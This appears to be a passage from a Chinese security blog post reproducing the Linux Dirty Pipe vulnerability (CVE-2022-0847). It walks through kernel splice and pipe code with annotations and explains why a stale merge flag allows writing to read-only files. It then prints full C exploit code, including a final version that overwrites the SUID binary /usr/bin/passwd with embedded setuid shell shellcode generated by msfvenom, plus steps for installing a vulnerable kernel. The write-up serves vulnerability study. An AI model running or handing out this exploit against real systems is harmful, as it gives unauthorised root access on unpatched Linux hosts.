}

//如果只有输入文件描述符是管道,则执行从管道到文件的splice操作
if (ipipe) {
//在从管道中读取数据时,不允许指定偏移量
if (off_in)
return -ESPIPE;
if (off_out) {
if (!(out->f_mode & FMODE_PWRITE))//先检查输出文件是否支持写入操作(即是否支持PWRITE模式)
return -EINVAL;
if (copy_from_user(&offset, off_out, sizeof(loff_t)))//从用户空间拷贝输出偏移量到内核空间的offset变量中
return -EFAULT;
} else {
offset = out->f_pos;//没有指定输出偏移量,则将输出偏移量设置为输出文件当前的位置
}

//检查是否设置了O_APPEND标志,如果设置了,表示在输出文件末尾追加数据,这是不允许的
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;

//验证写入操作的有效性,包括检查文件是否可写以及写入位置是否有效。
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;
//然后检查输入文件是否设置了O_NONBLOCK标志,如果设置了,则将SPLICE_F_NONBLOCK标志添加到flags中,表示执行非阻塞的splice操作
if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

//调用file_start_write()函数通知文件系统开始写入操作
file_start_write(out);
ret = do_splice_from(ipipe, out, &offset, len, flags);//由do_splice_from()函数完成从管道到文件的数据传输
file_end_write(out);//调用file_end_write()函数通知文件系统写入操作已经完成。

//如果没有指定输出偏移量,则更新输出文件的位置为写入数据后的位置。
if (!off_out)
out->f_pos = offset;
else if (copy_to_user(off_out, &offset, sizeof(loff_t)))
ret = -EFAULT;

return ret;
}
//如果只有输出文件描述符是管道,则执行从文件到管道的splice操作
if (opipe) {
if (off_out)//向管道中写入数据时,不允许指定偏移量
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))//先检查输入文件是否支持读取操作(即是否支持PREAD模式)
return -EINVAL;
if (copy_from_user(&offset, off_in, sizeof(loff_t)))//从用户空间拷贝输入偏移量到内核空间的offset变量中
return -EFAULT;
} else {
offset = in->f_pos;//没有指定输入偏移量,则将输入偏移量设置为输入文件当前的位置
}

//如果输出文件描述符设置了非阻塞标志(O_NONBLOCK),则设置相应的标志位
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

//获取管道的锁,以确保并发情况下管道的操作不会冲突
pipe_lock(opipe);

//等待管道有足够的空间来写入数据
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;

/* Don't try to read more the pipe has space for. */
/*
opipe->max_usage 表示管道的最大使用量,即管道的总容量。
pipe_occupancy(opipe->head, opipe->tail) 表示当前管道中已占用的空间。
通过计算可知,p_space 表示管道中的剩余可用空间,即总容量减去已占用的空间。
*/
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
//将写入数据的长度限制为当前管道剩余空间和给定长度 len 中的较小者。
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = do_splice_to(in, &offset, opipe, len, flags);
}
//解锁
pipe_unlock(opipe);

//如果写入成功(返回值大于0),则唤醒管道上的读取者
if (ret > 0)
wakeup_pipe_readers(opipe);
//如果没有指定输入偏移量,则更新输入文件描述符的当前位置
if (!off_in)
in->f_pos = offset;
//如果指定了输入偏移量,则将最终的偏移量从内核空间拷贝回用户空间
else if (copy_to_user(off_in, &offset, sizeof(loff_t)))
ret = -EFAULT;

return ret;
}

return -EINVAL;
}

管道->管道

并不是很重要,就放一边吧😋

splice_pipe_to_pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
/*
* Splice contents of ipipe to opipe.
*/
static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
struct pipe_buffer *ibuf, *obuf;
unsigned int i_head, o_head;
unsigned int i_tail, o_tail;
unsigned int i_mask, o_mask;
int ret = 0;
bool input_wakeup = false;


retry:
ret = ipipe_prep(ipipe, flags);
if (ret)
return ret;

ret = opipe_prep(opipe, flags);
if (ret)
return ret;

/*
* Potential ABBA deadlock, work around it by ordering lock
* grabbing by pipe info address. Otherwise two different processes
* could deadlock (one doing tee from A -> B, the other from B -> A).
*/
pipe_double_lock(ipipe, opipe);

i_tail = ipipe->tail;
i_mask = ipipe->ring_size - 1;
o_head = opipe->head;
o_mask = opipe->ring_size - 1;

do {
size_t o_len;

if (!opipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

i_head = ipipe->head;
o_tail = opipe->tail;

if (pipe_empty(i_head, i_tail) && !ipipe->writers)
break;

/*
* Cannot make any progress, because either the input
* pipe is empty or the output pipe is full.
*/
if (pipe_empty(i_head, i_tail) ||
pipe_full(o_head, o_tail, opipe->max_usage)) {
/* Already processed some buffers, break */
if (ret)
break;

if (flags & SPLICE_F_NONBLOCK) {
ret = -EAGAIN;
break;
}

/*
* We raced with another reader/writer and haven't
* managed to process any buffers. A zero return
* value means EOF, so retry instead.
*/
pipe_unlock(ipipe);
pipe_unlock(opipe);
goto retry;
}

ibuf = &ipipe->bufs[i_tail & i_mask];
obuf = &opipe->bufs[o_head & o_mask];

if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
} else {
/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;

/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;
} while (len);

pipe_unlock(ipipe);
pipe_unlock(opipe);

/*
* If we put data in the output pipe, wakeup any potential readers.
*/
if (ret > 0)
wakeup_pipe_readers(opipe);

if (input_wakeup)
wakeup_pipe_writers(ipipe);

return ret;
}

文件->管道

do_splice_to

do_splice_to 中最终会调用到内核文件结构体函数表的 splice_read 指针,对于不同的文件系统而言该函数指针不同,以 ext4 文件系统为例,查表 ext4_file_operations,对应调用的函数应为 generic_file_splice_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
* Attempt to initiate a splice from a file to a pipe.
*/
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
//验证源文件是否具有读取 len 字节数据的权限
ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;

if (in->f_op->splice_read)
return in->f_op->splice_read(in, ppos, pipe, len, flags);
return default_file_splice_read(in, ppos, pipe, len, flags);
}

generic_file_splice_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;
//初始化 to 迭代器,将管道的读操作设置到 to 迭代器中,同时设置缓冲区长度为 len
iov_iter_pipe(&to, READ, pipe, len);
i_head = to.head;
//初始化 kiocb 异步I/O控制块,使用给定的文件指针 in
init_sync_kiocb(&kiocb, in);
kiocb.ki_pos = *ppos;

//调用 call_read_iter 函数,从文件中读取数据到管道。这里实际上是调用了文件的 read_iter 操作,并将读取的数据写入到管道中。
ret = call_read_iter(in, &kiocb, &to);
if (ret > 0) {
*ppos = kiocb.ki_pos;
file_accessed(in);
} else if (ret < 0) {
to.head = i_head;
to.iov_offset = 0;
iov_iter_advance(&to, 0); /* to free what was emitted */
/*
* callers of ->splice_read() expect -EAGAIN on
* "can't put anything in there", rather than -EFAULT.
*/
if (ret == -EFAULT)
ret = -EAGAIN;
}

return ret;
}

在ext4文件系统中,read_iter其实为shmem_file_read_iter,这B函数调用链有点小长,贴个调用链先

1
2
3
4
shmem_file_read_iter
shmem_getpage;根据文件索引获取页框
copy_page_to_iter;将页框数据复制到目标缓冲区中
copy_page_to_iter_pipe();如果目标缓冲区是管道迭代器,将数据复制到管道缓冲区中

copy_page_to_iter_pipe

最终在 copy_page_to_iter_pipe() 中,将对应的 pipe_buffer->page 设为文件映射的页面集的对应页框,将页框引用计数 + 1(get_page()),这样就完成了一个从文件读取数据到管道的过程,因为是直接建立页面的映射,所以每次操作后都会将 head +1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

//off是NULL应该🤔
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

PS:此处并没有对pipe_buffer->flags的设置操作

管道->文件

do_splice_from

do_splice_from 最终会根据所操作的文件的属性调用相应的内核文件结构中的 splice_write() 函数指针。

1
2
3
4
5
6
7
8
9
10
11
/*
* Attempt to initiate a splice from pipe to file.
*/
static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
if (out->f_op->splice_write)
return out->f_op->splice_write(pipe, out, ppos, len, flags);
return default_file_splice_write(pipe, out, ppos, len, flags);
}

iter_file_splice_write

ext4文件系统中,这个函数指针是iter_file_splice_write,最终会调用如下函数

1
2
3
4
5
6
7
iter_file_splice_write
splice_from_pipe_next ;检查管道可用性
vfs_iter_write ;将读取的数据写入目标文件
do_iter_write
do_iter_readv_writev
call_write_iter
generic_file_write_iter ;后面还有,但应该就是普通的拷贝数据之类的

0x03:漏洞分析

我们现在知道以下几点

  • PIPE_BUF_FLAG_CAN_MERGEpipe_buffer->page是否能写入的标志
  • pipe_write中会将pipe_buffer->flags设置成PIPE_BUF_FLAG_CAN_MERGE
  • pipe_read中读取完成后free这些page并不会把flags置0
  • 从文件复制到管道中copy_page_to_iter_pipeget_page不会重新设置flags,因此此时pipe_buffer指向的page是目标文件映射的pagepipe_buffer->flags && PIPE_BUF_FLAG_CAN_MERGE == true,表示此时对这个page拥有写入权限了。这就意味着如果我们打开的是一个只有只读权限的文件,现在可以越权写入

于是有了这样一个思路

  • step Ⅰ:创建一个pipe
  • step Ⅱ:把pipe写满,使所有pipe_buffer->flags都被设置上PIPE_BUF_FLAG_CAN_MERGE
  • step Ⅲ:读取pipe中的所有数据,清空pipe
  • step Ⅳ:打开目标文件,利用splice将内容从文件拷贝到管道,此时pipe_buffer->page为文件在内存中的映射页框,pipe_buffer->flags保留有之前设置的PIPE_BUF_FLAG_CAN_MERGE,此时在管道中对该文件具有写入权限。pipe head +1
  • step Ⅴ:利用write向管道中写入恶意数据,因为上一个 pipe_buffer 没有写满,从而将数据拷贝到上一个 pipe_buffer 对应的页面——即文件映射的页面。完成越权写入

0x04:漏洞利用

demo

经过上述分析利用demo就很好写了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>


#define PAGE_SIZE 0x1000
#define PIPE_DEF_BUFFERS 16
#define DATA_SIZE PAGE_SIZE*PIPE_DEF_BUFFERS

struct stat dest_st;
int pipe_fd[2], dest_fd;
pid_t fork_pid;
char * data;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}


int main(int argc , char * argv[], char * envp[])
{
data = mmap(NULL, DATA_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, NULL);

puts("[*] make pipe_buffer all flags-> PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
fork_pid = fork();
if (fork_pid < 0)
{
err_exit("fork failed!");
} else if (fork_pid == 0)
{
puts("[*] pipe write");
write(pipe_fd[1], data, DATA_SIZE);
exit(0);
}
puts("[*] pipe read");
read(pipe_fd[0], data, DATA_SIZE);


dest_fd = open(argv[1], O_RDONLY);
if (dest_fd < 0)
err_exit("open dest file failed!");

fstat(dest_fd, &dest_st);

puts("[*] keep the flags->PIPE_BUF_FLAG_CAN_MERGE");
splice(dest_fd, NULL, pipe_fd[1], NULL, 1, SPLICE_F_MOVE);

puts("[*] overwrite now");
write(pipe_fd[1], "\nkorey0sh1\n", 11);

return 0;

}

随便用qemu起了个环境,kernel version = 5.8

效果还是很成功的

提权

常规的suid提权方式

查看具有root权限的suid文件

1
find / -perm -u=s -type f 2>/dev/null

此处还是选择老朋友/usr/bin/passwd

用msf生成提权的shellcode

1
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

final exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>


#define PAGE_SIZE 0x1000
#define PIPE_DEF_BUFFERS 16
#define DATA_SIZE PAGE_SIZE*PIPE_DEF_BUFFERS

struct stat dest_st;
int pipe_fd[2], dest_fd;
pid_t fork_pid;
char * data;

unsigned char attack_data[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

int data_len = 149;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}


int main(int argc , char * argv[], char * envp[])
{
data = mmap(NULL, DATA_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, NULL);

puts("[*] make pipe_buffer all flags-> PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
fork_pid = fork();
if (fork_pid < 0)
{
err_exit("fork failed!");
} else if (fork_pid == 0)
{
puts("[*] pipe write");
write(pipe_fd[1], data, DATA_SIZE);
exit(0);
}
puts("[*] pipe read");
read(pipe_fd[0], data, DATA_SIZE);


dest_fd = open(argv[1], O_RDONLY);
if (dest_fd < 0)
err_exit("open dest file failed!");

fstat(dest_fd, &dest_st);

puts("[*] keep the flags->PIPE_BUF_FLAG_CAN_MERGE");
splice(dest_fd, NULL, pipe_fd[1], NULL, 1, SPLICE_F_MOVE);

puts("[*] overwrite now");
//从第二位开始覆写
write(pipe_fd[1], &attack_data[1], data_len-1);

return 0;

}

环境:

运行效果

some tricks

笔者在最后一直苦于找不到合适的kernel版本的虚拟机呜呜呜呜呜,因为下了个挺古早版本的ubuntu20,觉得应该能符合版本要求

结果玩意会自动更新,下下来漏洞都是被patch的

最后发现了xi@0ji233 的文章,了解到了一种十分方便快捷的更换kernel版本的方法

首先先用apt寻找一下这个版本

1
apt-cache search linux | grep 5.8.

选择这个

下载

1
sudo apt install linux-image-5.8.0-63-generic

接下来更改grub启动项

1
sudo gedit /etc/default/grub

改成这样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# If you change this file, run 'update-grub' afterwards to update
# /boot/grub/grub.cfg.
# For full documentation of the options in this file, see:
# info -f grub -n 'Simple configuration'

GRUB_DEFAULT=0
GRUB_TIMEOUT_STYLE=hidden
GRUB_TIMEOUT=30
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="text"
GRUB_CMDLINE_LINUX="find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_US"

# Uncomment to enable BadRAM filtering, modify to suit your needs
# This works with Linux (no patch required) and with any kernel that obtains
# the memory map information from GRUB (GNU Mach, kernel of FreeBSD ...)
#GRUB_BADRAM="0x01234567,0xfefefefe,0x89abcdef,0xefefefef"

# Uncomment to disable graphical terminal (grub-pc only)
#GRUB_TERMINAL=console

# The resolution used on graphical terminal
# note that you can use only modes which your graphic card supports via VBE
# you can see them in real GRUB with the command `vbeinfo'
#GRUB_GFXMODE=640x480

# Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux
#GRUB_DISABLE_LINUX_UUID=true

# Uncomment to disable generation of recovery mode menu entries
#GRUB_DISABLE_RECOVERY="true"

# Uncomment to get a beep at grub start
#GRUB_INIT_TUNE="480 440 1"

更新grub

1
sudo update-grub

reboot重启后狂按SHIFT+TAB进入引导模式,选择高级设置,选择新下载的内核版本,即可完成环境搭建

0xff:写在最后的最后

The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation (cm4all.com)

拜读完漏洞发现者的博客,敬佩他居然能从一次小小的CRC校验错误入手,深挖近一年时间,挖掘原本并不熟悉的Linux Kernel

并最终发现了Dirty Pipe这一威力巨大的内核0day

作者的探索精神,值得笔者学习

路漫漫其修远兮,吾将上下而求索

refer

CVE-2022-0847 dirtypipe漏洞复现-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

【CVE.0x06】CVE-2022-0847 漏洞复现及简要分析 - arttnba3’s blog


CVE-2022-0847(Dirty Pipe) Remake
http://example.com/2024/03/18/dirtypipe/
作者
korey0sh1
发布于
2024年3月18日
许可协议